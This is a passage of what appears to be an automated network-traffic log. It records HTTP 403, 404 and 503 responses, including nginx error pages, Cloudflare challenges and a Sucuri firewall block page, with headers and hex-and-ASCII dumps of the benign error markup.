3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:43 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UDAl8MPrUDbBDY3EtZSoa5qXsMXViTCyEYec3Z0adN4Vra44Y0JkhysJk%2Bo1cG9emWjgQEEVKeQfPWJXX6P1YJtFNpZCmZJAQ0fk3Yg1OYAR%2FDHQVPeEAv0C%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc7f3dc449b8e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 62 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 Data Ascii: 1b1d<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equ
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingServer: namecheap-nginxData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Mar 2023 04:44:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 246X-Sorting-Hat-ShopId: 9394790X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 907e18ce-b4ce-4275-b196-b86cc3c150ddCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KUBDhvdwvoFXXDUe7SsdVGKYVYMZFGjc0%2BVYLe%2B0X7NXPdOkA9RYk%2BqDghwZasP0irZHNys4bGxMt1BhBoEQlLF1Old2f%2F4Do%2FW8bqtcHjjkzy94o%2BCN9plZusYj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=269.000292Server: cloudflareCF-RAY: 7abbc7f3dab49262-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 22 Mar 2023 04:44:43 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: LL4k20if/OchL3cI5Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: nginxDate: Wed, 22 Mar 2023 04:44:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedX-Powered-By: PHP/7.3.33Pragma: no-cacheCache-Control: no-cache, must-revalidate, private, max-age=0Expires: Sat, 26 Jul 1997 05:00:00 GMTRetry-After: 3600Vary: Accept-Encoding,User-AgentData Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 74 69 74 6c 65 3e 59 6f 75 72 20 61 63 63 65 73 73 20 74 6f 20 74 68 69 73 20 73 69 74 65 20 68 61 73 20 62 65 65 6e 20 6c 69 6d 69 74 65 64 20 62 79 20 74 68 65 20 73 69 74 65 20 6f 77 6e 65 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 38 37 35 72 65 6d 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 33 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 7d 0a 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 7d 0a 0a 09 09 61 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 23 30 30 37 30 39 65 3b 0a 09 09 7d 0a 0a 09 09 68 31 2c 20 68 32 2c 20 68 33 2c 20 68 34 2c 20 68 35 2c 20 68 36 20 7b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 3b 0a 09 09 7d 0a 0a 09 09 68 31 2c 20 2e 68 31 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 72 65 6d 3b 20 7d 0a 09 09 68 32 2c 20 2e 68 32 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 35 72 65 6d 3b 20 7d 0a 09 09 68 33 2c 20 2e 68 33 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35 72 65 6d 3b 20 7d 0a 09 09 68 34 2c 20 2e 68 34 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 72 65 6d 3b 20 7d 0a 09 09 68 35 2c 20 2e 68 35 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 38 37 35 72 65 6d 3b 20 7d 0a 09 09 68 36 2c 20 2e 68 36 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 37 35 72 65 6d 3b 20 7d 0a 0a 09 09 68 31 2c 20 68 32 2c 20 68 33 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 7d 0a 09 09 68 34 2c 20 68 35 2c 20 68 36 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 7d 0a 0a 09 09 2e 77 66 2d 62 74 6e 20 7b 0a 09 09 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0a
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Wed, 22 Mar 2023 04:44:43 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 22 Mar 2023 04:44:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15003X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9%2BmAVoaMRrtBUkX5f51RKKENnK1EdfBmFpTZhAbGMO5KHeMgO9yZoSOWvY2mr86jDwbJZiSAs90XrbjUSSezf%2B3xZF2QEeSTS1r0vmHrQI2%2BNc3Ic%2FDnQMs24eNaaA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc7f94b189134-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 62 36 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 Data Ascii: 1b6f<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta ht
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:44 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 